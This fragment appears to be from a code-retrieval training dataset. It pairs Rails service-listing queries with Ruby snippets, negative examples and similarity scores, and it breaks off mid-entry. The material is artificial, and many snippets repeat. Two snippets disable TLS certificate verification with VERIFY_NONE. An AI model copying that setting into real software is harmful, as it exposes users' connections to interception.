"def service_list\n uri = URI.parse(@url)\n http = Net::HTTP.new(uri.host, uri.port, @proxy_addr, @proxy_port)\n http.use_ssl = true\n http.verify_mode = OpenSSL::SSL::VERIFY_NONE\n request = Net::HTTP::Get.new(uri.request_uri)\n request.basic_auth user, passwd\n request.add_field 'X-ID-TENANT-NAME', id_domain\n http.request(request)\n end",
"def services\n ret = []\n offset = 0\n loop do\n cur = get(\"services?limit=#{PAGINATION_SIZE}&offset=#{offset}\")\n offset += PAGINATION_SIZE\n ret.push *cur.services\n break if offset >= cur.total\n end\n ret\n end",
"def index\n @title = \"Services - JC Auto Restoration, Inc.\"\n @services = Service.all\n end",
"def index\n @services = Service.all(:order => \"did_at DESC\")\n\n respond_to do |format|\n format.html # index.html.erb\n format.xml { render :xml => @services }\n end\n end",
"def index\n @services = @page.services.all\n \n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @services }\n end\n end",
"def services\n response = JSON.parse(@client.get(\"/api/v1/services\").body)\n return response[\"services\"] || response\n end",
"def services\n\n end",
"def services\n end",
"def services\n services = @saloon.services\n\n render_success(data: services, each_serializer: ServiceSerializer)\n end",
"def index\n @services = Service.all\n end",
"def index\n @services = Service.all\n end",
"def index\n @services = Service.all\n end",
"def index\n @services = Service.all\n end",
"def index\n @services = Service.all\n end",
"def index\n @services = Service.all\n end",
"def index\n @services = Service.all\n end",
"def index\n @services = Service.all\n end",
"def index\n @services = Service.all\n end",
"def index\n @services = Service.find_all_by_user_id(current_user.account_id)\n\n respond_to do |format|\n format.html # index.html.haml\n format.json { render json: @services }\n end\n end",
"def index\n @request_services = RequestService.all\n end",
"def lookup_services(extension, arg)\n extension += \"/#{arg}\"\n uri = URI.parse(API_URL + extension)\n response = connect(uri)\n puts response.body\n end",
"def index\n @service_versions = ServiceVersion.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.xml { render :xml => @service_versions }\n end\n end",
"def services\n\tend",
"def service_document\n response = get(@url.to_s)\n response.body\n end",
"def index\n @xservices = Xservice.all\n end",
"def get_services(nickname = nil)\n nickname ||= @nickname\n agent = get_login_agent()\n\n services_uri = ROOT_URI + (\"/%s/services\" % URI.encode(nickname))\n parser = agent.get(services_uri).parser\n\n active_servicelist = parser.xpath(\"//*[@class='active']//ul[@class='servicelist']\")\n\n if !active_servicelist.empty?\n services = active_servicelist.xpath(\"./li/a\").map { |a|\n {\n 'service' => a['class'].split.find { |a_class|\n a_class != 'l_editservice' && a_class != 'service'\n },\n 'serviceid' => a['serviceid'].to_s,\n }\n }\n profile_uri = ROOT_URI + (\"/%s\" % URI.encode(nickname))\n agent.get(profile_uri).parser.xpath(\"//div[@class='servicespreview']/a\").each_with_index { |a, i|\n href = (profile_uri + a['href'].to_s).to_s\n break if profile_uri.route_to(href).relative?\n services[i]['profileUrl'] = href\n }\n else\n services = parser.xpath(\"//ul[@class='servicelist']/li/a\").map { |a|\n {\n 'service' => a['class'].split.find { |a_class|\n a_class != 'service'\n },\n 'profileUrl' => (services_uri + a['href'].to_s).to_s,\n }\n }\n end\n services\n end",
"def index\n @per_page_options = %w{ 21 51 99 }\n respond_to do |format|\n format.html # index.html.erb\n format.xml # index.xml.builder\n format.atom # index.atom.builder\n format.json { render :json => ServiceCatalographer::Api::Json.index(\"services\", json_api_params, @services).to_json }\n format.bljson { render :json => ServiceCatalographer::Api::Bljson.index(\"services\", @services).to_json }\n end\n end",
"def index\n @service = Service.all()\n end",
"def index\n apis = site_account.api_docs_services\n .published\n .with_system_names((params[:services] || \"\").split(\",\"))\n .select{ |api| api.specification.swagger_1_2? }\n\n respond_with({\n swaggerVersion: \"1.2\",\n apis: apis.map!{ |service| swagger_spec_for(service) },\n basePath: \"#{request.protocol}#{request.host}\"\n })\n end",
"def show\n @service = Service.find(params[:id])\n \n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @service }\n end\n end",
"def list_vs_services(options)\n options['method'] = \"vs\"\n dir_list = get_dir_item_list(options)\n message = \"vSphere Services:\"\n handle_output(options,message)\n dir_list.each do |service|\n handle_output(options,service)\n end\n handle_output(options,\"\")\n return\nend",
"def show\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @service }\n end\n end",
"def get_xml\n response = @api.request(:get, @location, type: 'xml')\n response.body if response.status == 200\n end",
"def get_service(nickname = nil)\n nickname ||= @nickname\n agent = get_web_agent()\n\n services_uri = ROOT_URI + (\"/%s/services\" % URI.encode(nickname))\n parser = agent.get(services_uri).parser\n\n active_servicelist = parser.xpath(\"//*[@class='active']//ul[@class='servicelist']\")\n\n if !active_servicelist.empty?\n services = active_servicelist.xpath(\"./li/a\").map { |a|\n {\n 'service' => a['class'].split.find { |a_class|\n a_class != 'l_editservice' && a_class != 'service'\n },\n 'serviceid' => a['serviceid'].to_s,\n }\n }\n else\n services = parser.xpath(\"//ul[@class='servicelist']/li/a\").map { |a|\n {\n 'service' => a['class'].split.find { |a_class|\n a_class != 'service'\n },\n 'profileUrl' => (services_uri + a['href'].to_s).to_s,\n }\n }\n end\n services\n end",
"def services()\n return @data[\"access\"][\"serviceCatalog\"]\n end",
"def show\n @approximate_service = ApproximateService.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @approximate_service }\n end\n end",
"def show\n @service = Service.find(params[:id])\n end",
"def show\n @service = Service.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @service }\n end\n end",
"def show\n @service = Service.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @service }\n end\n end",
"def show\n @service = Service.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @service }\n end\n end",
"def list_services(client, args, options)\n response = client.get(RESOURCE_PATH)\n\n if CloudClient::is_error?(response)\n [response.code.to_i, response.to_s]\n else\n #[0,response.body]\n if options[:json]\n [0,response.body]\n else\n array_list = JSON.parse(response.body)\n SERVICE_TABLE.show(array_list['DOCUMENT_POOL']['DOCUMENT'])\n 0\n end\n end\nend",
"def show\n @service_log = ServiceLog.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @service_log }\n end\n end",
"def show\n @service = Service.find(params[:id])\n end",
"def index\n @emt_services = EmtService.all\n end",
"def get_services(opts = {})\n data, _status_code, _headers = get_services_with_http_info(opts)\n data\n end",
"def show\n @service_version = ServiceVersion.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @service_version }\n end\n end",
"def index\n delocalize_dates([:from_fecha_hora_greater_than_or_equal_to, :from_fecha_hora_less_than_or_equal_to]) if params[:search]\n @services = do_index(Service, params)\n\n respond_to do |format|\n format.html # index.html.erb\n format.xml { render :xml => @services }\n end\n end",
"def index\n @api_docs_services = api_docs_services.all\n respond_with(@api_docs_services)\n end",
"def show\n @complex_service = ComplexService.find(params[:id])\n\t\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @complex_service }\n end\n end",
"def index\n services = accessible_services.includes(:proxy, :account).order(:id).paginate(pagination_params)\n respond_with(services)\n end",
"def index\n services = accessible_services.includes(:proxy, :account).order(:id).paginate(pagination_params)\n respond_with(services)\n end",
"def get_all(options = {})\n custom_params = options[:dc] ? use_named_parameter('dc', options[:dc]) : nil\n ret = send_get_request(@conn, ['/v1/catalog/services'], options, custom_params)\n OpenStruct.new JSON.parse(ret.body)\n end",
"def show\n @service_checker = ServiceChecker.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @service_checker }\n end\n end",
"def show\n @final_service = FinalService.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @final_service }\n end\n end",
"def servers(service_id)\n request :get, \"/services/#{service_id}/servers\"\n end",
"def api_xml(path,method=:get,options={})\n xml_message(amee,\"/data\"+path,method,options)\n end",
"def sword_services\n Utility.find_elements_by_namespace_and_name(extensions, \"http://purl.org/net/sword/terms/\", \"service\")\n end",
"def show\n @service_center = ServiceCenter.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @service_center }\n end\n end",
"def services\n @services_manager\n end",
"def index\n @service_requests = ServiceRequest.all\n end",
"def show\n @service_line = ServiceLine.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @service_line }\n end\n end",
"def list\n get('/')\n end",
"def list_services\n services.map do |service|\n Hashie::Mash.new({\n service: service,\n display_name: service_display_name(service),\n id: service_id(service)\n })\n end\n end",
"def service_request(service); end",
"def index\n @services = Service.where search_params\n respond_with @services if stale? @services\n end",
"def loadservices\n yml = YAML::load(File.open('services.yml'))\n yml.each do |el| \n puts \"grabbing info for #{el[1]['name']}\"\n yml = infoFor(el[1]['regex'])\n logyml(el[1]['name'], yml)\n\n puts \"sending info for #{el[1]['name']}\"\n sendreport(el[1]['name'])\n end\n end",
"def test_get_services\n services =\n AdWords::Service.get_services(AdWords::Service.get_versions.first)\n\n assert_kind_of(Array, services, 'Service list is not an array')\n\n services.each do |service|\n assert_kind_of(String, service, 'Service name is not a string')\n end\n end",
"def index\n @scheduled_services = ScheduledService.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @scheduled_services }\n end\n end",
"def service_requests_list\n @service_requests = ServiceRequest.get_all_service_requests(@page)\n end",
"def get_all options=nil\n url = [\"/v1/catalog/services\"]\n url += check_acl_token\n url << use_named_parameter('dc', options[:dc]) if options and options[:dc]\n begin\n ret = @conn.get concat_url url\n rescue Faraday::ClientError\n raise Diplomat::PathNotFound\n end\n\n return OpenStruct.new JSON.parse(ret.body)\n end",
"def index\n respond_with(accessible_services)\n end",
"def index\n @service_plans = ServicePlan.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.xml { render :xml => @service_plans }\n end\n end",
"def get_listings_xml(url)\n @client.get_content(url)\n end",
"def services\n begin\n resp = _get build_agent_url('services')\n rescue\n logger.warn('Unable to request all the services on this through the HTTP API')\n return nil\n end\n # Consul returns id => ConsulServiceObjects.\n s_hash = JSON.parse(resp)\n s_hash.keys.map { |n| Consul::Model::Service.new.extend(Consul::Model::Service::Representer).from_hash(s_hash[n]) }\n end",
"def show\n @service = current_user.pro.services.find(params[:id])#Service.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @service }\n end\n end",
"def query_service(service)\n #remove on production/create testing case?\n resp = @client.get_content(service)\n @@logger.debug \"Service succesfully queried\"\n\n return resp\n end",
"def rest_get(uri)\n \n request = Net::HTTP::Get.new uri\n request.add_field(\"Accept\",\"application/xml\")\n auth_admin(request)\n \n Net::HTTP.start(uri.host, uri.port) do |http|\n response = http.request request\n response.value\n\n doc = REXML::Document.new response.body\n \n return doc\n \n end\n \nend",
"def service_uri\n \"#{host}#{service_path}\"\n end",
"def index\n @serviceordemservices = Serviceordemservice.all\n end",
"def xml(options = {})\n http = Net::HTTP.new(Picasa.host, 443)\n http.use_ssl = true\n http.verify_mode = OpenSSL::SSL::VERIFY_NONE\n path = Picasa.path(options)\n response = http.get(path, auth_header)\n if response.code =~ /20[01]/\n response.body\n elsif response.code.to_i == 403\n raise RubyPicasa::PicasaError, \"Authentication failed. You may need to refresh your access token.\"\n end\n end",
"def index\n @servicemen = Serviceman.all\n end",
"def services\n @services ||= []\n end",
"def services\n return @services\n end",
"def index\n @call_services = CallService.all\n end",
"def index\n @admin_services = Admin::Service.all.order(sort_column + \" \" + sort_direction)\n respond_to do |format|\n format.html { @admin_services = [] }\n format.json { render \"index\" }\n format.xml { render xml: @admin_services }\n end\n end",
"def show\n @online_service = OnlineService.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @online_service }\n end\n end",
"def find_service(id)\n self.class.get(\"/services/#{id}.json?apikey=#{apikey}\")\n end"
] |
[
"0.7579505",
"0.73009115",
"0.6991401",
"0.6859058",
"0.6828459",
"0.6824559",
"0.658619",
"0.6579678",
"0.65689564",
"0.6517968",
"0.65074795",
"0.64588135",
"0.64162534",
"0.6404057",
"0.63568646",
"0.6342013",
"0.63139445",
"0.63027984",
"0.62867755",
"0.6264572",
"0.62580806",
"0.62186974",
"0.621688",
"0.6194851",
"0.6194851",
"0.6194851",
"0.6194851",
"0.6194851",
"0.6194851",
"0.6194851",
"0.6194851",
"0.6194851",
"0.61681616",
"0.6166474",
"0.61637163",
"0.6163135",
"0.60997784",
"0.604961",
"0.6025336",
"0.59895635",
"0.59878176",
"0.5986825",
"0.598188",
"0.597116",
"0.59686816",
"0.5962249",
"0.59370905",
"0.59344715",
"0.592974",
"0.59215057",
"0.5902138",
"0.58865136",
"0.58865136",
"0.58865136",
"0.5876564",
"0.5871422",
"0.58712673",
"0.5868576",
"0.5865096",
"0.584527",
"0.5836437",
"0.5821756",
"0.58196795",
"0.58060557",
"0.58060557",
"0.5795837",
"0.57913756",
"0.57877845",
"0.5786198",
"0.5781673",
"0.5780788",
"0.57784486",
"0.57781404",
"0.57624316",
"0.5761933",
"0.5759955",
"0.5752373",
"0.574108",
"0.5733645",
"0.5732259",
"0.57263213",
"0.5720132",
"0.5710146",
"0.5704606",
"0.5704158",
"0.570115",
"0.56952345",
"0.56914824",
"0.5687783",
"0.5678397",
"0.56605613",
"0.5639137",
"0.563661",
"0.5635764",
"0.56327707",
"0.56305385",
"0.56302804",
"0.5624251",
"0.56208557",
"0.56196064",
"0.5613945"
] |
0.0
|
-1
|
GET /services/1 GET /services/1.xml
|
def show
@service = Service.find(params[:id], :conditions => conditions)
@alerts = Alert.all({
:conditions => ["service_id = ? and severity <> 0", @service.id]
})
params[:date] = Date.today.to_s if params[:date].blank?
@date_range = parse_date_range params[:date]
@metric = @service.metric
now = Time.now
#now = Time.parse("2010-6-10 12:00") #for test
d = @metric.history({:start => now - 24*60*60, :finish => now})
if d.size > 0
@history_views = @service.history_views
@history_views.each do |view|
view.data = d
end
end
d = @metric.current
if d
@default_view = @service.default_view
@default_view.data = d if @default_view
@current_views = @service.views
@current_views.each do |view|
view.data = d
end
end
respond_to do |format|
format.html # show.html.erb
format.xml {
#render :xml => @service.to_xml(:dasherize => false)
}
end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def service(id)\n request :get, \"/services/#{id}\"\n end",
"def index\n endpoint(get(services_url).body)\n end",
"def show\n @service = Service.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @service }\n end\n end",
"def show\n @page_id = \"services\"\n @service = Service.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @service }\n end\n end",
"def list_services\n response = @http_client.get(prefix_path('services'))\n Response.new(response)\n end",
"def show\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @service }\n end\n end",
"def all(options = {})\n out = xml_run build_command('services', options.merge(:get => XML_COMMANDS_GET))\n convert_output(out.fetch(:stream, {}).fetch(:service_list, {}).fetch(:service, []), :service)\n end",
"def services(query = {})\n get('service', query)\n end",
"def url\n resource.url + '/services'\n end",
"def lookup_services(extension, arg)\n extension += \"/#{arg}\"\n uri = URI.parse(API_URL + extension)\n response = connect(uri)\n puts response.body\n end",
"def index\n @service_versions = ServiceVersion.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.xml { render :xml => @service_versions }\n end\n end",
"def index\n @services = Service.all(:order => \"did_at DESC\")\n\n respond_to do |format|\n format.html # index.html.erb\n format.xml { render :xml => @services }\n end\n end",
"def services\n params = { command: 'account_services' }\n get('/json.php', params)\n end",
"def show\n @service_version = ServiceVersion.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @service_version }\n end\n end",
"def service_list\n uri = URI.parse(@url)\n http = Net::HTTP.new(uri.host, uri.port, @proxy_addr, @proxy_port)\n http.use_ssl = true\n http.verify_mode = OpenSSL::SSL::VERIFY_NONE\n request = Net::HTTP::Get.new(uri.request_uri)\n request.basic_auth user, passwd\n request.add_field 'X-ID-TENANT-NAME', id_domain\n http.request(request)\n end",
"def show\n @approximate_service = ApproximateService.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @approximate_service }\n end\n end",
"def service_request(service); end",
"def show\n @service_log = ServiceLog.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @service_log }\n end\n end",
"def show\n @service = Service.find(params[:id])\n end",
"def index\n @title = \"Services - JC Auto Restoration, Inc.\"\n @services = Service.all\n end",
"def show\n @service = Service.find(params[:id])\n end",
"def services\n\n end",
"def get_services\n reply = @client.call(:get_services)\n\n data = reply.body.dig(:get_services_response,\n :get_services_result,\n :array_of_string)\n data = check_if_data_exists(data)\n\n data.map do |attrs|\n {\n id: Integer(attrs[:string][0], 10),\n name: attrs[:string][1]\n }\n end\n end",
"def show\n @service_checker = ServiceChecker.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @service_checker }\n end\n end",
"def show\n @complex_service = ComplexService.find(params[:id])\n\t\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @complex_service }\n end\n end",
"def services\n end",
"def api_xml(path,method=:get,options={})\n xml_message(amee,\"/data\"+path,method,options)\n end",
"def show\n @service_line = ServiceLine.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @service_line }\n end\n end",
"def show\n @service = Service.find(params[:id])\n \n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @service }\n end\n end",
"def service_document\n response = get(@url.to_s)\n response.body\n end",
"def index\n apis = site_account.api_docs_services\n .published\n .with_system_names((params[:services] || \"\").split(\",\"))\n .select{ |api| api.specification.swagger_1_2? }\n\n respond_with({\n swaggerVersion: \"1.2\",\n apis: apis.map!{ |service| swagger_spec_for(service) },\n basePath: \"#{request.protocol}#{request.host}\"\n })\n end",
"def show\n @final_service = FinalService.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @final_service }\n end\n end",
"def services\n\tend",
"def new\n @page_id = \"services\"\n @service = Service.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @service }\n end\n end",
"def show\n @service = Service.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @service }\n end\n end",
"def show\n @service = Service.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @service }\n end\n end",
"def show\n @service = Service.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @service }\n end\n end",
"def index\n @services = @page.services.all\n \n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @services }\n end\n end",
"def read(id=nil)\r\n request = Net::HTTP.new(@uri.host, @uri.port)\r\n if id.nil?\r\n response = request.get(\"#{@uri.path}.xml\") \r\n else\r\n response = request.get(\"#{@uri.path}/#{id}.xml\") \r\n end\r\n response.body\r\n end",
"def find_service(id)\n self.class.get(\"/services/#{id}.json?apikey=#{apikey}\")\n end",
"def index\n @services = Service.all\n end",
"def index\n @services = Service.all\n end",
"def index\n @services = Service.all\n end",
"def index\n @services = Service.all\n end",
"def index\n @services = Service.all\n end",
"def index\n @services = Service.all\n end",
"def index\n @services = Service.all\n end",
"def index\n @services = Service.all\n end",
"def index\n @services = Service.all\n end",
"def servicio # :doc\n id = params[:service_id]\n if id.present?\n \t\tService.find(params[:service_id]) \n \tend \n end",
"def services\n\t\tService.find(:all)\n\tend",
"def index\n @per_page_options = %w{ 21 51 99 }\n respond_to do |format|\n format.html # index.html.erb\n format.xml # index.xml.builder\n format.atom # index.atom.builder\n format.json { render :json => ServiceCatalographer::Api::Json.index(\"services\", json_api_params, @services).to_json }\n format.bljson { render :json => ServiceCatalographer::Api::Bljson.index(\"services\", @services).to_json }\n end\n end",
"def new\n @service = Service.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml\n end\n end",
"def index\n @request_services = RequestService.all\n end",
"def index\n @xservices = Xservice.all\n end",
"def index\n delocalize_dates([:from_fecha_hora_greater_than_or_equal_to, :from_fecha_hora_less_than_or_equal_to]) if params[:search]\n @services = do_index(Service, params)\n\n respond_to do |format|\n format.html # index.html.erb\n format.xml { render :xml => @services }\n end\n end",
"def get_xml\n response = @api.request(:get, @location, type: 'xml')\n response.body if response.status == 200\n end",
"def servers(service_id)\n request :get, \"/services/#{service_id}/servers\"\n end",
"def service_uri\n \"#{host}#{service_path}\"\n end",
"def xml(id)\n http.get(\"/nfse/#{id}/xml\") do |response|\n response.headers.fetch(\"Location\") { \"\" }\n end\n end",
"def new\n @service = Service.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @service }\n end\n end",
"def new\n @service = Service.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @service }\n end\n end",
"def index\n @services = Service.find_all_by_user_id(current_user.account_id)\n\n respond_to do |format|\n format.html # index.html.haml\n format.json { render json: @services }\n end\n end",
"def get_service(nickname = nil)\n nickname ||= @nickname\n agent = get_web_agent()\n\n services_uri = ROOT_URI + (\"/%s/services\" % URI.encode(nickname))\n parser = agent.get(services_uri).parser\n\n active_servicelist = parser.xpath(\"//*[@class='active']//ul[@class='servicelist']\")\n\n if !active_servicelist.empty?\n services = active_servicelist.xpath(\"./li/a\").map { |a|\n {\n 'service' => a['class'].split.find { |a_class|\n a_class != 'l_editservice' && a_class != 'service'\n },\n 'serviceid' => a['serviceid'].to_s,\n }\n }\n else\n services = parser.xpath(\"//ul[@class='servicelist']/li/a\").map { |a|\n {\n 'service' => a['class'].split.find { |a_class|\n a_class != 'service'\n },\n 'profileUrl' => (services_uri + a['href'].to_s).to_s,\n }\n }\n end\n services\n end",
"def show\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @service }\n end\n end",
"def show\n @bus_service = BusService.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @bus_service }\n end\n end",
"def get_services()\n return get_request(address(\"/OS-KSADM/services\"), token())\n end",
"def show\n @service_center = ServiceCenter.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @service_center }\n end\n end",
"def show\n @latest_version = @service.latest_version\n @latest_version_instance = @latest_version.service_versionified\n @latest_deployment = @service.latest_deployment\n\n @all_service_version_instances = @service.service_version_instances\n @all_service_types = @service.service_types\n\n @soaplab_server = @service.soaplab_server\n\n @pending_responsibility_requests = @service.pending_responsibility_requests\n unless is_api_request?\n @service_tests = @service.service_tests\n @test_script_service_tests = @service.service_tests_by_type(\"TestScript\")\n @url_monitor_service_tests = @service.service_tests_by_type(\"UrlMonitor\")\n end\n if @latest_version_instance.is_a?(RestService)\n @grouped_rest_methods = @latest_version_instance.group_all_rest_methods_from_rest_resources\n end\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml # show.xml.builder\n format.json { render :json => @service.to_json }\n end\n end",
"def read(id=nil)\n request = Net::HTTP.new(@uri.host, @uri.port)\n if id.nil?\n response = request.get(\"#{@uri.path}.xml\")\n else\n response = request.get(\"#{@uri.path}/#{id}.xml\")\n end\n\n response.body\n end",
"def get_calls(service)\n\t\treturn @transport.get_path(\"calls\",service)\n\tend",
"def query_service(service)\n #remove on production/create testing case?\n resp = @client.get_content(service)\n @@logger.debug \"Service succesfully queried\"\n\n return resp\n end",
"def index\n @service = Service.all()\n end",
"def list_services\n @services\n end",
"def show\n @service_subscription = ServiceSubscription.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @service_subscription }\n end\n end",
"def show\n @nossos_servico = NossosServico.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @nossos_servico }\n end\n end",
"def services\n ret = []\n offset = 0\n loop do\n cur = get(\"services?limit=#{PAGINATION_SIZE}&offset=#{offset}\")\n offset += PAGINATION_SIZE\n ret.push *cur.services\n break if offset >= cur.total\n end\n ret\n end",
"def rest_get(uri)\n \n request = Net::HTTP::Get.new uri\n request.add_field(\"Accept\",\"application/xml\")\n auth_admin(request)\n \n Net::HTTP.start(uri.host, uri.port) do |http|\n response = http.request request\n response.value\n\n doc = REXML::Document.new response.body\n \n return doc\n \n end\n \nend",
"def services\n services = @saloon.services\n\n render_success(data: services, each_serializer: ServiceSerializer)\n end",
"def list_services(client, args, options)\n response = client.get(RESOURCE_PATH)\n\n if CloudClient::is_error?(response)\n [response.code.to_i, response.to_s]\n else\n #[0,response.body]\n if options[:json]\n [0,response.body]\n else\n array_list = JSON.parse(response.body)\n SERVICE_TABLE.show(array_list['DOCUMENT_POOL']['DOCUMENT'])\n 0\n end\n end\nend",
"def service; services.first; end",
"def show\n @service_report = ServiceReport.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @service_report }\n end\n end",
"def index\n @services = Service.where search_params\n respond_with @services if stale? @services\n end",
"def get_version\n response = self.class.get(\"/service/#{$service_id}/version/#{$service_version}\", {\n headers: {\"Fastly-Key\" => $key}\n })\n end",
"def index\n @service_plans = ServicePlan.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.xml { render :xml => @service_plans }\n end\n end",
"def show\n @service = current_user.pro.services.find(params[:id])#Service.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @service }\n end\n end",
"def index\n @service_requests = ServiceRequest.all\n end",
"def loadservices\n yml = YAML::load(File.open('services.yml'))\n yml.each do |el| \n puts \"grabbing info for #{el[1]['name']}\"\n yml = infoFor(el[1]['regex'])\n logyml(el[1]['name'], yml)\n\n puts \"sending info for #{el[1]['name']}\"\n sendreport(el[1]['name'])\n end\n end",
"def index\n respond_to do |format|\n format.html { render_template } # index.html.erb\n format.xml { render xml: @vip_programmer_service }\n end\n end",
"def show\n @service_length = ServiceLength.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @service_length }\n end\n end",
"def show\n @services_charger = ServicesCharger.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @services_charger }\n end\n end",
"def get_services(nickname = nil)\n nickname ||= @nickname\n agent = get_login_agent()\n\n services_uri = ROOT_URI + (\"/%s/services\" % URI.encode(nickname))\n parser = agent.get(services_uri).parser\n\n active_servicelist = parser.xpath(\"//*[@class='active']//ul[@class='servicelist']\")\n\n if !active_servicelist.empty?\n services = active_servicelist.xpath(\"./li/a\").map { |a|\n {\n 'service' => a['class'].split.find { |a_class|\n a_class != 'l_editservice' && a_class != 'service'\n },\n 'serviceid' => a['serviceid'].to_s,\n }\n }\n profile_uri = ROOT_URI + (\"/%s\" % URI.encode(nickname))\n agent.get(profile_uri).parser.xpath(\"//div[@class='servicespreview']/a\").each_with_index { |a, i|\n href = (profile_uri + a['href'].to_s).to_s\n break if profile_uri.route_to(href).relative?\n services[i]['profileUrl'] = href\n }\n else\n services = parser.xpath(\"//ul[@class='servicelist']/li/a\").map { |a|\n {\n 'service' => a['class'].split.find { |a_class|\n a_class != 'service'\n },\n 'profileUrl' => (services_uri + a['href'].to_s).to_s,\n }\n }\n end\n services\n end",
"def show\n @service_check_detail = ServiceCheckDetail.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @service_check_detail }\n end\n end",
"def list_vs_services(options)\n options['method'] = \"vs\"\n dir_list = get_dir_item_list(options)\n message = \"vSphere Services:\"\n handle_output(options,message)\n dir_list.each do |service|\n handle_output(options,service)\n end\n handle_output(options,\"\")\n return\nend",
"def service_directory_name\n \"rest\"\n end",
"def index\n @event_services = EventService.all.where(event_id: params[:event_id])\n @event = Event.find(params[:event_id])\n end",
"def service\n @service ||= fetcher.get(Service, service_id)\n end",
"def index\n services = accessible_services.includes(:proxy, :account).order(:id).paginate(pagination_params)\n respond_with(services)\n end",
"def index\n services = accessible_services.includes(:proxy, :account).order(:id).paginate(pagination_params)\n respond_with(services)\n end",
"def server(service_id, server_id)\n request :get, \"/services/#{service_id}/servers/#{server_id}\"\n end",
"def show\n @service = Service.find(params[:id])\n build_service_content\n \n respond_to do |format|\n format.html # show.html.erb\n end\n end"
] |
[
"0.723194",
"0.721514",
"0.6730267",
"0.67126286",
"0.6581411",
"0.6567619",
"0.6438637",
"0.64325076",
"0.6306425",
"0.6260527",
"0.6197347",
"0.61746657",
"0.61644286",
"0.6164009",
"0.6106485",
"0.6106036",
"0.6087944",
"0.6068472",
"0.6034685",
"0.6034039",
"0.6010789",
"0.6010059",
"0.60043037",
"0.5995787",
"0.5987187",
"0.5952009",
"0.5949028",
"0.5948134",
"0.5936072",
"0.59283507",
"0.58992505",
"0.589549",
"0.588833",
"0.5878129",
"0.5866787",
"0.5866787",
"0.5866787",
"0.5855112",
"0.58549476",
"0.5852191",
"0.5845065",
"0.5845065",
"0.5845065",
"0.5845065",
"0.5845065",
"0.5845065",
"0.5845065",
"0.5845065",
"0.5845065",
"0.5845052",
"0.5841864",
"0.5837094",
"0.58269614",
"0.5819927",
"0.5812021",
"0.58100945",
"0.5801358",
"0.57954246",
"0.5793321",
"0.5789879",
"0.57773215",
"0.57773215",
"0.57753515",
"0.576456",
"0.5762838",
"0.5742345",
"0.5739349",
"0.5730752",
"0.5700076",
"0.569775",
"0.5691283",
"0.56863797",
"0.5683742",
"0.56734884",
"0.5664377",
"0.56614786",
"0.5661294",
"0.5660054",
"0.56557053",
"0.5653236",
"0.5644369",
"0.5643727",
"0.56318665",
"0.56306833",
"0.56276864",
"0.5618131",
"0.560659",
"0.5591246",
"0.5574793",
"0.5550121",
"0.554836",
"0.5547349",
"0.5545144",
"0.5542527",
"0.55419123",
"0.5537499",
"0.55300516",
"0.55297345",
"0.55297345",
"0.55260444",
"0.5519346"
] |
0.0
|
-1
|
select host or app
|
def select
@type = params[:type]
